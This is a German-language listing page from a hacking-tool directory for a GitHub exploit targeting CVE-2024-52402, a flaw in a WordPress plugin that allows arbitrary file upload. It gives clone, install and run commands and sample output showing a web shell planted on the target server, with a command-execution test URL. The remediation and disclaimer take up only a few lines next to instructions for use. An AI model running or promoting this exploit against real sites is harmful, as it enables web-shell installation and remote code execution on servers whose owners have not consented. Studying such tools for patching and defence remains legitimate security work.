Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-52402 — WordPress Exclusive Content Password Protect Plugin <= 1.1.0 - CSRF to Arbitrary File Upload Schwachstelle | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-52402
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubnxploited/cve-2024-52402

CVE-2024-52402

WordPress Exclusive Content Password Protect Plugin <= 1.1.0 - CSRF to Arbitrary File Upload Schwachstelle

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚀 Exploit für CVE-2024-52402: WordPress Exclusive Content Password Protect Plugin <= 1.1.0

🛡️ Übersicht

Dieser Exploit zielt auf eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle im WordPress Exclusive Content Password Protect Plugin, Versionen bis einschließlich 1.1.0. Diese Schwachstelle ermöglicht es einem Angreifer, eine Web-Shell auf den Webserver hochzuladen, was zu potenzieller Remote-Code-Ausführung führt.

📅 Details

  • Veröffentlicht: 2024-11-19
  • CVE-ID: CVE-2024-52402
  • Plugin-Version: Exclusive Content Password Protect <= 1.1.0
  • Schweregrad: KRITISCH (CVSS 9.6)

⚙️ Verwendung

Um diese Schwachstelle auszunutzen, müssen Sie die Ziel-URL der WordPress-Website, einen gültigen WordPress-Benutzernamen und ein Passwort angeben. Das Exploit-Skript meldet sich bei der WordPress-Website an und versucht, eine Web-Shell hochzuladen.

🔧 Befehl

root@kitploit:~
python CVE-2024-52402.py -u <target> -un <username> -p <password>

🛠️ Optionen

root@kitploit:~
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

🌟 Beispiel

root@kitploit:~
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin

🚀 Beispielausgabe

root@kitploit:~
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami

📜 Beschreibung

Dieses Skript nutzt die CSRF-Schwachstelle im Exclusive Content Password Protect Plugin aus, um eine Web-Shell auf den WordPress-Server hochzuladen. Es führt jedoch keinen direkten CSRF-Angriff durch; stattdessen konzentriert es sich darauf, die Datei-Upload-Funktionalität des Plugins für die Ausnutzung zu verwenden.

👨‍💻 So führen Sie das Skript aus

  1. Repository klonen

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52402.git
    cd CVE-2024-52402
    
  2. Anforderungen installieren Stellen Sie sicher, dass die requests-Bibliothek installiert ist:

    root@kitploit:~
    pip install requests
    
  3. Skript ausführen Verwenden Sie den folgenden Befehl, um das Skript auszuführen:

    root@kitploit:~
    python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
    

🛡️ Abhilfe

Um diese Schwachstelle zu beheben, aktualisieren Sie das Exclusive Content Password Protect Plugin auf die neueste Version, in der dieses Problem behoben wurde.

⚠️ Haftungsausschluss

Dieses Skript ist nur für Bildungszwecke gedacht. Die unbefugte Verwendung dieses Skripts gegen Systeme, für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.

Exploit von: Nxploit, Khaled alenazi.

Tool herunterladen